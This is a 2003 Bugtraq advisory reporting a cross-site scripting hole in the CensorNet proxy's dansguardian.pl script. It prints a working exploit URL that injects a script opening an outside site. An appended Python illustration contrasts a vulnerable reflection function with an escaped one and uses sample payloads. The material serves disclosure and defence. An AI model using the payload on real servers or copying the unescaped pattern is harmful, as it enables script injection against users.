[32138] in bugtraq

CensorNet: Cross Site Scripting Vulnerability

daemon@ATHENA.MIT.EDU (Richard Maudsley)
Thu Oct 23 13:14:12 2003

Message-id: <fc.00802e600020bf4c00802e600020bf4c.20c0f8@rbwm.org>
Date: Wed, 22 Oct 2003 12:51:13 +0100
To: bugtraq@securityfocus.com, support@adelix.com, wrigd006@rbwm.org,
        frenw001@rbwm.org
From: "Richard Maudsley" <maudr001@rbwm.org>
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and HTML) to be passed to the
CGI script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script>

Regards,
	Richard Maudsley


- -------------------------------------------------------------------
    This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
       content of this email please contact abuse@rbwm.org
- -------------------------------------------------------------------
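The server-side fix for the reflection reported above, as an added example that is not part of the original post and is not CensorNet's code. The block-page template, the function names and the sample query strings are assumptions constructed for illustration; the advisory does not show the source of dansguardian.pl.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed block-page template: the denied URL is shown as a link, which is
# consistent with the reported payload starting with "</a>".
TEMPLATE = '<p>Access denied: <a href="{href}">{text}</a></p>'


def denied_url(query_string):
    """Extract the DENIEDURL parameter from a raw query string."""
    return parse_qs(query_string).get("DENIEDURL", [""])[0]


def render_vulnerable(query_string):
    """Reflects DENIEDURL unencoded, the behaviour the advisory reports."""
    url = denied_url(query_string)
    return TEMPLATE.format(href=url, text=url)


def render_hardened(query_string):
    """Encodes DENIEDURL for HTML and only links http/https URLs."""
    url = denied_url(query_string)
    # Escape &, <, > and both quote characters so the value cannot close
    # the attribute or the element it is placed in.
    text = html.escape(url, quote=True)
    try:
        scheme = urlsplit(url).scheme.lower()
    except ValueError:  # malformed URL, e.g. an unbalanced IPv6 bracket
        scheme = ""
    # Escaping alone does not stop javascript: URLs in an href, so anything
    # other than http/https is shown as plain text with no link.
    if scheme not in ("http", "https"):
        return "<p>Access denied: {}</p>".format(text)
    return TEMPLATE.format(href=text, text=text)


if __name__ == "__main__":
    # Constructed sample inputs.
    for qs in ("DENIEDURL=http://example.test/page",
               "DENIEDURL=</a><script>alert(1)</script>",
               "DENIEDURL=javascript:alert(1)"):
        print(render_hardened(qs))
```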
